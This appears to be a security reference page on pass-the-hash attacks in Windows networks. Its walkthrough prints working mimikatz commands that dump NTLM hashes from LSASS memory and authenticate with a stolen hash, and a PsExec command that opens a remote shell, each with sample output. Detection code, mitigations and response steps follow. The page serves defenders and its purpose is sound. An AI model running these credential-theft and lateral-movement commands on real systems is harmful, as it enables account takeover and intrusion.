Overview
Once an adversary has gained a foothold in the network, their tactics shift to compromising additional systems and obtaining the privileges they need to complete their mission. Pass-the-hash is a credential theft and lateral movement technique in which an attacker can abuse the challenge-and-response nature of the NTLM authentication protocol to authenticate as a user with only the NTLM hash of the user’s password. The attacker is thus able to use the compromised account without ever obtaining or brute-forcing the plaintext password. Password hashes normally only change when the password itself is changed, granting the adversary significant time to abuse the compromised user(s).
How It Works
Step 1 - Steals password hashes
There are a number of methods by which an adversary can obtain password hashes once they have gained a foothold in a network. The most common of these is to extract password hashes from the LSASS.exe process memory, which stores hashes for users with active sessions to the computer. In order for this technique to work, the adversary must have compromised administrative privileges to the computer (e.g. the user that opened their phishing email is an administrator of their workstation).
The following example shows an adversary dumping hashes from LSASS. However, it is possible to obtain password hashes in other ways, such as DCSync and extracting hashes from NTDS.dit.
Code
PS> .\mimikatz.exe "privilege::debug" "log passthehash.log" "sekurlsa::logonpasswords"
Authentication Id : 0 ; 302247 (00000000:00049ca7)
Session : RemoteInteractive from 2
User Name : joed
Domain : DOMAIN
Logon Server : DC1
Logon Time : 09/07/2020 10:31:19
SID : S-1-5-21-3501040295-3816137123-30697657-1109
msv :
[00000003] Primary
* Username : joed
* Domain : DOMAIN
* NTLM : eed224b4784bb040aab50b8856fe9f02
* SHA1 : 42f95dd2a124ceea737c42c06ce7b7cdfbf0ad4b
* DPAPI : e75e04767f812723a24f7e6d91840c1d
tspkg :
wdigest :
* Username : joed
* Domain : DOMAIN
* Password : (null)
kerberos :
* Username : joed
* Domain : domain.com
* Password : (null)
ssp :
credman :
Step 2 - Uses pass-the-hash to authenticate
Next, the adversary uses the stolen password hash and the pass-the-hash technique to authenticate as the compromised user. While this example demonstrates using the stolen password hash to launch cmd.exe, it is also possible to pass-the-hash directly over the wire to any accessible resource permitting NTLM authentication.
To pass the hash using mimikatz's sekurlsa::pth, the following parameters are specified:
- /user: the compromised user's username
- /domain: the FQDN of the domain if using a domain account; or, "." if using a local account
- /ntlm:, /aes128:, or /aes256: the stolen NTLM, AES-128, or AES-256 password hash
Console
PS> .\mimikatz.exe "sekurlsa::pth /user:JoeD /domain:domain.com /ntlm:eed224b4784bb040aab50b8856fe9f02"
user : JoeD
domain : domain.com
program : cmd.exe
impers. : no
NTLM : eed224b4784bb040aab50b8856fe9f02
| PID 11560
| TID 10044
| LSA Process is now R/W
| LUID 0 ; 58143370 (00000000:0377328a)
\_ msv1_0 - data copy @ 000001AE3DDE8A30 : OK !
\_ kerberos - data copy @ 000001AE3DECE9E8
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000001AE3DFEC428 (32) -> null
# New CMD Window Opens
Step 3 - Accesses other resources
Next, an adversary will use their newly acquired privileges to further their objectives. Tools like PSExec may be used to execute commands on remote systems, enabling the attacker to expand their footprint and repeat the cycle of credential theft and lateral movement on an ever-growing number of systems.
Console
PS> .\PSExec.exe \\server1 cmd.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
server1
Detect
Because NTLM authentication is processed by each workstation and server, pass-the-hash can be challenging for organizations to detect, as each endpoint needs to be monitored for suspicious activity.
- Monitor NTLM authentications (particularly for remote connections) for changes in patterns of user behavior, for example: a user accessing a larger number of endpoints than normal; or, a user accessing endpoints for the first time.
- In order to extract hashes from an endpoint's LSASS.exe process, the malware would need to obtain a handle with the PROCESS_VM_OPERATION and PROCESS_VM_WRITE privileges. Endpoint Detection and Response solutions can monitor for processes creating suspicious handles.
- Extracting hashes from Active Directory requires administrative privileges and use of other techniques like DCSync and extracting hashes from NTDS.dit. Detection of these techniques is discussed on their Attack Catalog pages.
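The first two detection points above can be reduced to two endpoint-side checks. The following is an added example, not code from the original page or from any vendor's product: it runs a baseline-versus-window comparison of NTLM network logons (Security event 4624 fields, in a CSV export shape assumed here) to flag accounts reaching endpoints for the first time or reaching many more endpoints than usual, and it inspects constructed ProcessAccess records (Sysmon event 10 field names, also an assumption) for handles to LSASS.exe whose granted access includes PROCESS_VM_OPERATION or PROCESS_VM_WRITE. All records are constructed sample data, not real logs.

```python
"""
Two endpoint-side checks for the pass-the-hash indicators described above.
Added example; all input records below are constructed, not real logs.
  1. NTLM network logons (4624) compared against a per-account baseline.
  2. Handles opened to LSASS.exe with memory-write access rights.
"""
import csv
import io
from collections import defaultdict

# --- 1. NTLM logon pattern changes ---------------------------------------
# Constructed export of 4624 records, one per row. 'day' is a relative day
# index used to split baseline from analysis window; Computer is the endpoint
# that recorded the logon. Days 1-4 are baseline, days 8-9 are the window.
LOGON_CSV = """day,Computer,TargetDomainName,TargetUserName,LogonType,AuthenticationPackageName,IpAddress
1,FILESRV1,DOMAIN,joed,3,NTLM,10.1.1.20
2,FILESRV1,DOMAIN,joed,3,NTLM,10.1.1.20
3,PRINTSRV,DOMAIN,joed,3,NTLM,10.1.1.20
4,FILESRV1,DOMAIN,joed,3,Kerberos,10.1.1.20
1,FILESRV1,DOMAIN,alice,3,NTLM,10.1.1.31
2,WS-ALICE,DOMAIN,alice,2,Negotiate,-
8,FILESRV1,DOMAIN,joed,3,NTLM,10.1.1.20
8,SERVER1,DOMAIN,joed,3,NTLM,10.1.1.20
8,SERVER2,DOMAIN,joed,3,NTLM,10.1.1.20
8,SERVER3,DOMAIN,joed,3,NTLM,10.1.1.20
8,DC1,DOMAIN,joed,3,NTLM,10.1.1.20
9,FILESRV1,DOMAIN,alice,3,NTLM,10.1.1.31
"""


def parse_logons(text):
    """Parse the CSV export into dicts with normalized (upper-cased) names."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append({
            "day": int(r["day"]),
            "host": r["Computer"].upper(),
            "account": (r["TargetDomainName"] + "\\" + r["TargetUserName"]).upper(),
            "logon_type": int(r["LogonType"]),
            "auth_pkg": r["AuthenticationPackageName"].upper(),
        })
    return rows


def ntlm_network_logons(rows):
    """Keep only remote (Logon Type 3) logons that authenticated with NTLM."""
    return [r for r in rows if r["logon_type"] == 3 and r["auth_pkg"] == "NTLM"]


def endpoints_per_account(rows):
    """Map each account to the set of endpoints it reached over NTLM."""
    seen = defaultdict(set)
    for r in ntlm_network_logons(rows):
        seen[r["account"]].add(r["host"])
    return seen


def detect_pattern_changes(rows, window_start_day, growth_factor=2.0):
    """Compare each account's NTLM remote-logon footprint in the analysis
    window (day >= window_start_day) with its footprint in the baseline
    before it. Returns (account, reason, detail) tuples sorted by account."""
    base = endpoints_per_account([r for r in rows if r["day"] < window_start_day])
    cur = endpoints_per_account([r for r in rows if r["day"] >= window_start_day])
    findings = []
    for account in sorted(cur):
        known, reached = base.get(account, set()), cur[account]
        first_time = sorted(reached - known)  # endpoints never seen in baseline
        if first_time:
            findings.append((account, "first-time endpoints", first_time))
        if known and len(reached) >= growth_factor * len(known):
            findings.append((account, "endpoint count above baseline",
                             (len(reached), len(known))))
    return findings


# --- 2. Suspicious handles to LSASS --------------------------------------
# Process access rights from the Win32 API (assumed constants, not from the page).
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010      # not named on the page; often added to this mask
PROCESS_VM_WRITE = 0x0020
WRITE_ACCESS = PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Constructed ProcessAccess records using Sysmon event 10 field names.
HANDLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Users\joed\Downloads\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1438"},
    {"SourceImage": r"C:\Users\joed\Downloads\tool.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1fffff"},
]


def suspicious_lsass_handles(events):
    """Return (source image, granted access) for handles to lsass.exe whose
    access mask includes PROCESS_VM_OPERATION or PROCESS_VM_WRITE."""
    hits = []
    for e in events:
        if not e["TargetImage"].lower().endswith("\\lsass.exe"):
            continue
        granted = int(e["GrantedAccess"], 16)
        if granted & WRITE_ACCESS:
            hits.append((e["SourceImage"], hex(granted)))
    return hits


if __name__ == "__main__":
    for finding in detect_pattern_changes(parse_logons(LOGON_CSV), window_start_day=8):
        print("NTLM pattern change:", finding)
    for hit in suspicious_lsass_handles(HANDLE_EVENTS):
        print("LSASS handle:", hit)
```

On the constructed data, joed is flagged twice (four endpoints never seen before, and five endpoints against a baseline of two) while alice, whose NTLM footprint is unchanged, produces nothing; only the download-folder binary's handle to lsass.exe trips the access-mask check, since the svchost handle carries only a query right. The thresholds (growth factor, baseline window) are tuning knobs; in a real deployment the baseline should span enough time to cover the account's normal weekly activity.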
Mitigate
Because pass-the-hash abuses features of the NTLM protocol it cannot be entirely eliminated. However, there are solutions that can make it harder for adversaries to compromise hashes or restrict their ability to use those hashes to move laterally.
- Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and only permit trusted processes to access them.
- Remove users' administrator privileges from their workstations, limiting an adversary's ability to execute malware and removing the privileges needed to extract hashes from LSASS.exe.
- Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces a credential's value to an adversary seeking to use it for lateral movement.
- Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that a compromised credential can be used by an adversary to escalate privileges.
- Randomize and store local administrator passwords using a solution like Microsoft’s Local Administrator Password Solution (LAPS). This reduces an adversary’s ability to move laterally with local accounts that share the same password.
- Do not permit local accounts to authenticate over the network. This reduces an adversary's ability to move laterally with local accounts that share the same password. Two new well-known SIDs were added in Windows 8.1 and Windows Server 2012 R2 and can be used in group policies for this purpose. The SID S-1-5-113 will apply to any local account, while the SID S-1-5-114 will apply to any local account that is also a member of the local Administrators group.
- Add privileged domain accounts to the Protected Users group to reduce credential theft risks.
- Configure a host-based firewall (like Windows Defender Firewall) to control and limit which hosts can communicate with which others. For example, in most environments, workstations have little need to communicate directly with other workstations. Using a host-based firewall to block this traffic can limit lateral movement.
Respond
Should a suspected pass-the-hash attack be detected, there are several actions one can take to immediately respond:
- Activate the incident response process and alert the response team.
- Reset the password for the compromised user, which causes the stolen password hash to become invalid.
- Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities. Analyze logging to determine whether this computer is patient zero or whether the attacker pivoted to this machine from elsewhere, and whether the attacker pivoted from this machine to another.
Additional Resources
Further Reading
- Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques, Versions 1 and 2
- How to Detect Pass-the-Hash attacks
- Pass-the-hash attacks: Tools and Mitigation
- Pass-the-Hash in Windows 10
- Defeating Credential Guard
